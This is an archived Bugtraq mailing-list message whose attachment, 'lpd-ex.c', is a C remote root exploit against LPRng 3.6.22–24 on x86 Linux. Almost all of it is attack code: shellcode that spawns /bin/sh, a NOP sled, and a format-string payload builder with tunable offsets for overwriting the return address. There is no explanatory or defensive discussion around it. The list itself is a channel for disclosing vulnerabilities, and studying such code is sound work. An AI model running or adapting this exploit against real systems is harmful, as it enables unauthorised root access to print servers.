5842406 2000-12-07 21:16 +0000 /89 rader/ gabriel maggiotti <gmaggiot@CIUDAD.COM.AR> Bilagans filnamn: "lpd-ex.c" Importerad: 2000-12-11 02:31 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: gmaggiot@CIUDAD.COM.AR Mottagare: Bugtraq (import) <14142> Bilaga (text/plain) till text 5842405 Ärende: Bilaga (lpd-ex.c) till: Re: lpd buffer overflow ------------------------------------------------------------ /* LPRng remote root exploit for x86 Linux * 9/27/00 * * - JimJones * tested on compiled LPRng 3.6.22/23/24 * */ #include <unistd.h> #include <stdio.h> char sc[]= "\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff" "\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39" "\xf9\x75\xf5\x39\xd3\x7e\xee\xeb\x19\x5e\x89\xf3\x89\xf7\x83\xc7" "\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x0b" "\xcd\x80\xe8\xe2\xff\xff\xff/bin/sh" ; #define NOP 0x90 //will be split up, doesn't matter int main(int argc, char** argv) { char getbuf[1000]; int bpad=0; /* was 2 */ /* 3 for other */ /* 2 - -34 3 - -41 0 - -42 */ int i=0; int eiploc=0x41424344; char buffer[1024]; char fmtbuf[128]; int shloc=-1; //0xbffff2c8; int hi=100; int lo=200; int pre=0; int align=-36; int pos=511; //483; //488; /*299;*/ int debug=0; char s=0; char mode='n'; while ( ( s=getopt(argc, argv, "a:b:e:s:p:d")) != EOF) { switch(s) { case 'a': align=atoi(optarg); break; case 'b': bpad=atoi(optarg); break; case 'e': eiploc=strtoul(optarg, 0,0); break; case 's': shloc=strtoul(optarg, 0, 0); break; case 'p': pos=atoi(optarg); break; case 'd': debug=1; break; default: } } if (shloc == -1) shloc=eiploc+2450; memset(buffer, 0, sizeof(buffer)); memset(fmtbuf, 0, sizeof(fmtbuf)); memset(buffer, 'B', bpad); *(long*)(buffer+strlen(buffer))=eiploc+2; *(long*)(buffer+strlen(buffer))=0x50505050; *(long*)(buffer+strlen(buffer))=eiploc; pre=strlen(buffer); if (debug) { mode='p'; hi=100; lo=100; } else { hi=((shloc >> 16)&0xffff)-pre+align; /* was no 7 */ lo=((shloc >> 0)&0xffff)+0x10000-((shloc >> 16)&0xffff); } sprintf(fmtbuf, "%%%dd%%%d$h%c%%%dd%%%d$h%c", hi, pos, mode, lo, pos+2, mode); strcat(buffer+strlen(buffer), fmtbuf); /* make it easier to hit shellcode */ memset(buffer+strlen(buffer), NOP, 385); strcat(buffer, sc); *(char*)(buffer+strlen(buffer))=0; fprintf(stderr, "strlen(fmtbuf): %i\n", strlen(fmtbuf)); fprintf(stderr, "pos: %i\n", pos); fprintf(stderr, "align: %i\n", align); fprintf(stderr, "eip location: 0x%x\n", eiploc); fprintf(stderr, "shellcode location: 0x%x\n", shloc); fprintf(stderr, "strlen(sc): %i\n", strlen(sc)); fprintf(stderr, "strlen(buffer): %i\n", strlen(buffer)); printf("%s", buffer); putchar('\n'); } (5842406) ------------------------------------------